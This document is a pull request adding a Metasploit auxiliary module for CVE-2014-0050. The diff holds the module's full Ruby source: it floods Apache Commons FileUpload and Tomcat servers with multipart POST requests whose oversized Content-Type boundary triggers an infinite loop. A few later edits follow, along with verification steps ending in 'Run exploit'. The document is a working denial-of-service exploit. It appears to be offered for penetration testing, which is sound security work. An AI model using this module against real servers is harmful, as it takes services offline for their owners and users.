### PR TITLE
Add module for CVE-2014-0050

### DIFF
--- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
+++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
@@ -14,7 +14,7 @@ class Metasploit4 < Msf::Auxiliary
     super(update_info(info,
       'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
       'Description'     => %q{
-          This module triggers an inifinite loop in Apache Commons FileUpload 1.0 through 1.3
+          This module triggers an infinite loop in Apache Commons FileUpload 1.0 through 1.3
         via a Content-Type header.
         Apache Tomcat 7 and Apache Tomcat 8 use a copy of Apache Commons FileUpload
         to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
@@ -23,7 +23,7 @@ class Metasploit4 < Msf::Auxiliary
        },
        'Author'         =>
          [
-           'This issue was reported to the Apache Software Foundation and accidently made public.', # advisory
+           'Unknown', #This issue was reported to the Apache Software Foundation and accidently made public.
            'ribeirux' # metasploit module
          ],
        'License'        => MSF_LICENSE,
@@ -40,7 +40,7 @@ class Metasploit4 < Msf::Auxiliary
       register_options(
         [
           Opt::RPORT(8080),
-          OptString.new('URI', [ true,  "The request URI", '/']),
+          OptString.new('TARGETURI', [ true,  "The request URI", '/']),
           OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
         ], self.class)
   end
@@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
     boundary = "0"*4092
     opts = {
       'method'         => "POST",
-      'uri'            => normalize_uri(datastore['URI']),
+      'uri'            => normalize_uri(target_uri.to_s),
       'ctype'          => "multipart/form-data; boundary=#{boundary}",
       'data'           => "#{boundary}00000",
       'headers' => {

--- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
+++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
+      'Description'     => %q{
+          This module triggers an inifinite loop in Apache Commons FileUpload 1.0 through 1.3
+        via a Content-Type header.
+        Apache Tomcat 7 and Apache Tomcat 8 use a copy of Apache Commons FileUpload
+        to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
+        and 8.0.0-RC1 through 8.0.1 are affected by this issue.
+        Tomcat 6 also uses Commons FileUpload as part of the Manager application.
+       },
+       'Author'         =>
+         [
+           'This issue was reported to the Apache Software Foundation and accidently made public.', # advisory
+           'ribeirux' # metasploit module
+         ],
+       'License'        => MSF_LICENSE,
+       'References'     =>
+         [
+           ['CVE', '2014-0050'],
+           ['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
+           ['URL', 'http://tomcat.apache.org/security-8.html'],
+           ['URL', 'http://tomcat.apache.org/security-7.html'],
+         ],
+        'DisclosureDate' => 'Feb 6 2014'
+      ))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('URI', [ true,  "The request URI", '/']),
+          OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
+        ], self.class)
+  end
+
+  def run
+    boundary = "0"*4092
+    opts = {
+      'method'         => "POST",
+      'uri'            => normalize_uri(datastore['URI']),
+      'ctype'          => "multipart/form-data; boundary=#{boundary}",
+      'data'           => "#{boundary}00000",
+      'headers' => {
+        'Accept' => '*/*'
+      }
+    }
+
+    for x in 1..datastore['RLIMIT']
+      print_status("Sending request #{x} to #{rhost}:#{rport}")
+      begin
+        c = connect
+        r = c.request_cgi(opts)
+        c.send_request(r)
+        # Don't wait for a response
+      rescue ::Rex::ConnectionError => exception
+        print_error("#{rhost}:#{rport} - Unable to connect: '#{exception.message}'")
+        return
+      ensure
+        disconnect(c) if c
+      end
+    end
+  end
+end
+


### PR DESCRIPTION
This module triggers an infinite loop in Apache Commons FileUpload via a Content-Type header.
Apache Tomcat 7 and Apache Tomcat 8 are also affect by this issue.

For more details check:
- https://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E
- http://tomcat.apache.org/security-8.html
- http://tomcat.apache.org/security-7.html
## Verification
- Install apache tomcat 7.0.50
- Create a servlet that processes mime-multipart requests ( using annotation: @MultipartConfig)
- Deploy
- Run exploit
